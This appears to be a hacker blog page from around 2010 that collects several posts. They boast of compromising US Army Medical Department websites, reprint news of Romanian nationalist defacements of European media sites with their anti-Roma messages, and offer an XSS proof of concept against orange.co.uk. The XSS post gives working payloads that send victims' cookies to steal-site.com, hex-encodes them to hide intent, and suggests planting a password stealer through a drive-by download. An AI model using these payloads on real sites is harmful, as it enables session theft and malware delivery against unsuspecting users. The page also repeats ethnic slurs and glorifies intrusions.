dns.amedd.army.mil OwNeD

Department of Nursing Science

Link: http://www.dns.amedd.army.mil

Screenshot: http://img687.imageshack.us/img687/6968/dnsameddarmymil.png

Information: FTP Access

Method of attack: Unkn0wn

About:

The mission of the Department of Nursing Science is to coordinate and conduct education and training for resident officer and enlisted courses for which Department of Nursing Science is the proponent or nursing-specific liaison; to pursue state of the art training technology for all courses; to develop and oversee the conduct of distributed training courses for which Department of Nursing Science is the proponent; to serve as nursing subject matter expert for nursing issues and for doctrine developed under the proponency of the AMEDD Center and School.

RNS – Romanian National Security – Italy

The group of Romanian hacktivists calling themselves Romanian National Security (RNS) have attacked and defaced multiple websites belonging to the biggest Italian public television company Radiotelevisione Italiana (RAI), as well as leading Italian newspapers La Stampa and Corriere della Sera. The message left behind on the hacked Web properties condemns the association of the Romanian people with the Romani ethnic group, commonly referred to as gypsies.

RNS is a group of Romanian nationalist hackers who appear to have taken issue with how some international publications depict Romania and its people. Their initial hit was carried out earlier this month against renowned British newspaper The Daily Telegraph and resulted in the defacement of two websites hosted under the telegraph.co.uk domain.

Screenshot of  citymusiclab.city.corriere.it/eventi/ defaced
Enlarge  picture

A week later, the group retaliated in a similar fashion against reputable French newspaper Le Monde for a joke made by humorist Jonathan Lambert during a TV show on national television. The staged performance, which had Lambert present the so-called “new Romanian salute” by imitating a beggar with his hand raised, was strongly criticized in Romania for being offensive and racist.

Romanian security blog HackersBlog reports that http://www.citizenreport.rai.it, a community website owned and operated by the Italian public service broadcaster RAI, was hacked by members of the RNS via SQL injection. The hackers left behind a message, expressing anger at the local media.

The attacks on Italian publications continued with complete defacements of tuttoaffari.lastampa.it and citymusiclab.city.corriere.it/eventi/, two websites belonging to La Stampa and Corriere della Sera, respectively. At the time of writing this article, the index pages of both sites display a shield logo in the colors of the Romanian flag and the same threatening message used in the Radiotelevisione Italiana hack.

Sreenshot of tuttoaffari.lastampa.it defaced
Enlarge  picture

“It’s time to close our fingers into a fist and unforgivingly strike as many times as need be, for you to reap the harvest of your lies. We promise you will not forget about Romania and her past again. We, descendants of Trajan and Decebalus, are not a nation of gypsies! We have run out of patience and, in the name of Romanians everywhere, we warn that if you don’t stop presenting our entire people as Romani or gypsies, even more tricolor flags [reference to Romania’s red, yellow and blue flag] will be raised; until all untruths are exposed and apologies are issued,” the message signed by RNS reads.

A Romanian saying, roughly translating into “Eagles may occasionally fly lower than chickens, but chickens will never soar in the sky,” is displayed at the bottom, while Ciprian Porumbescu’s Ballad for Violin and Orchestra plays in the background.

Mirrors of the defaced websites are available via MirrorTurk for the RAI and Corriere della Sera attacks and Zone-H for the La Stampa one. According to HackersBlog, RNS members also found vulnerabilities on lordine.it, storialibera.it, giornaledicalabria.it, unita.it, pontediferro.org and momentosera.it, but these websites have not yet been defaced.

Source: http://news.softpedia.com/news/Romanian-Nationalists-Hit-Several-Italian-Media-Outlets-141062.shtml

Antena 1:

LeMonde.fr @ (Hacked) Romanian National Security

Saved on zone-h:

http://zone-h.org/mirror/id/10560479

The subdomain defaced:

http://planete-plus-intelligente.lemonde.fr

Screenshot:

Mesajul este destul de clar (The message):

Aceasta nu este o miscare de rezistenta, un protest, sau o revolta!
Este strigatul întregului popor român ce face apel la fratii nostri care au uitat ca si în venele noastre circula un sânge roman.
Sângele ce-a fost jertfit si varsat pe câmpurile de lupta pentru a fi scrisa istoria neamului nostru cere acum DREPTATE.
Eroii patriei noastre nu vor muri niciodata! Vrem sa nu se uite CINE l-a varsat pentru ca România sa existe astazi pe harta,
sa le amintim copiilor si nepotilor nostri, sa îi respectam cu onoarea cuvenita. Ne-a ajuns atâta batjocura.
Tiganii nu sunt Români! Nu ei ne-au scris istoria!
Când vorbiti despre compatriotii nostri nu mai folositi expresiile “Tigani Români”.
Noi v-am respectat Franta, voi ne veti respecta ROMĂ‚NIA!
R.N.S. VEGHEAZA pentru ca aceste lucruri sa fie înfaptuite..

———————————————————

Cu putine zile in urma tot aceasta echipa necunoscuta pana acum (RNSRomanian National Security) a mai transmis tot prin aceasi “metoda” un mesage destul de dur celor de la The Daily Telegraph.
Personal, din cate observ acesti baieti au ceva cu toate tarile care au stricat imaginea Romaniei.
Nu incurajez asemenea lucruri, dar unii chiar o merita!

———————————————————-

Sursa: http://www.hackersblog.org

———————————————————-

US Army Medical Department Regiment Hacked

About U.S. Army Medical Department:

The U.S. Army Medical Department was formed on 27 July, 1775, when the Continental Congress authorized a Medical Service for an army of 20,000 men. It created the Hospital Department and named Dr. Benjamin Church of Boston as Director General and Chief Physician. On 14 April, 1818 the Congress passed an Act which reorganized the staff departments of the Army. The Act provided for a Medical Department to be headed by a Surgeon General. Dr. Joseph Lovell, appointed Surgeon General of the United States Army in April 1818, was the first to hold this position in the new organization. The passage of this law marks the beginning of the modern Medical Department of the United States Army.
….
This web site been designed to provide you with useful information about the U.S. Army Medical Department (AMEDD) Regiment. Through this web site, you will learn the history of the AMEDD Regiment, the symbolism behind our heraldic items, how to wear the Regimental Distinctive insignia, and various programs available to you and your unit.

URL: http://ameddregiment.amedd.army.mil

Daily Telegraph websites hacked

Telegraph site hacked by Romanians
The ‘Romanian National Security’ logo on the Telegraph’s hacked site

Part of the Daily Telegraph‘s website has been hacked, apparently by people in Romania who were aggrieved at its identification of “gypsies” and “Romanians”.

Its “Short Breaks” and Wine And Dine sections were both hacked, with the Short Breaks site still up at 12.55pm today, with a picture of a Romanian flag claiming to be for the “Romanian National Security”, some comments in Romanian and the remark in English at the bottom that “Guess what, gypsies aren’t romanians, morons.” It also links to a Russian site which plays an MP3 called The Lonely Shepherd.

Sunbelt Software, which first noticed the hack, said that it had alerted the Telegraph when it noticed the hack.

The method used to hack into the site is not known. Chris Boyd, a researcher at Sunbelt, said that a translation of the text from the page says that the hackers are “sick of seeing garbage like this … calling us Romanians ‘gypsies’.” It also attacks Britain for “broadcasting shitty TV programs like Top Gear”.

But Boyd said that the group is apparently unknown even among Romanian hackers – suggesting that it may be one person with a grievance against the Telegraph.

In March 2009 the Telegraph’s system was also hacked, exposing the email addresses of registered users on part of its site. That hack also seems to have been done by a Romanian hacker – suggesting that the site has become a target.

A later posting in May on the Hackersblog site suggested that there was a weakness on the Telegraph site that allowed it to be hacked repeatedly.

Orange Vulnerable to XSS and phishing

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…

More here: [ XSS ]

I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.

Proof of Concept:

Link:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email="><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

c0de:

"><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)

Another example for this vulnerability is phishing! :D

As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.

I picked a executable program (winamp in our case) for a demonstration.

Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe

The malicious code:

"><iframe height="0" width="0" frameborder="0" src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe"></iframe>

Encoded in hex will become:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.

Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

vBulletin Full Disclosure [Python]

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

Link: http://codepad.org/pEBTI2dU

You need python 3.1 to work!